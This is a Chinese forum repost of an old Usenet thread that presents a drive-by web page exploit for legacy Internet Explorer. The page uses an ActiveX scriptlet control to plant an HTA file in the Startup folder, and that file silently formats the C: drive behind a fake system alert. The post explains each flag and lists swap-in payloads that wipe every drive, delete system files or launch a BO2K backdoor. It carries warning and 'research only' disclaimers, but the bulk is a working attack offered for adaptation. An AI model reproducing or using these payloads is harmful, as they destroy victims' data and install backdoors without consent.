引用 | 编辑
阿豆仙
2005-03-11 23:22 |
楼主
▼ |
||
x0
网页中安装的木马 收录这篇文章只是提醒网友们,网际网路不是安全的环境,道高一尺,魔高一丈,任何技术一直在进步,很多人都在默默的研究和修补系统漏洞,当然也有很多「不懂事的人」在私底下做坏事〈只会拿着现成的工具到处攻击别人那种人〉? F在台湾的电子商务尚未成熟,还有一段好长的路要走,置身网路中也别为了一时之便,随意留下个人资料,在你遨游网路时也要时时刻刻做好安全措施喔。以下的文章千万不能拿去做坏事... From: alerter.bbs@bbs.cs.nthu.edu.tw (小色男) Newsgroups: tw.bbs.comp.security Subject: Re: 装木马的技巧???? Date: 26 Sep 2000 08:51:56 GMT Organization: 清华资讯(枫桥驿站) 网页安装木马其实也是有可能的 <HTML> <header></header> <BODY> Hacking Your Computer . <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"> </object> <SCRIPT> scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"; scr.Doc=" <SCRIPT>wsh.Run('start.exe /m FORMat c:/q /autotest /u'); alert('IMPORTANT : Windows is removing unused temporary files.');"; scr.write(); </BODY> </HTML> (懂HTML的人应该就看得出来其中精随) 现在我大概来解释其中几个项目所写的意思 scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta" 这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为hack.hta wsh.Run('start.exe /m FORMat c:/q /autotest /u'); 通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。 它是一个微软没有公开的功能,键入后FORMat的动作便会被强制执行。 这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。 最后start.exe再配合/m选项可以使FORMat的DOS-prompt视窗在执行的时候处于最小化的状态。 执行其他攻击指令的方法: 只要修改“start.exe /m FORMat c:/q /autotest /u”这一项便形。 start.exe /m FORMat c:/q /autotest /u 其中的“c:”可以换做其他的硬碟。 (path)\bo2k.exe 执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。 start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 杀掉对方硬碟底下所有的档案。 start.exe /m deltree /y c:\windows\system\*.* 杀掉对方c:\windows\system\目录底下的所有档案。 后叙: 预防遭此手段的破坏就是到微软去更新你的浏览器。 请勿拿来害人,只供给学术研究来使用!!! 这篇是由别的论坛里挖出来的!! x0
|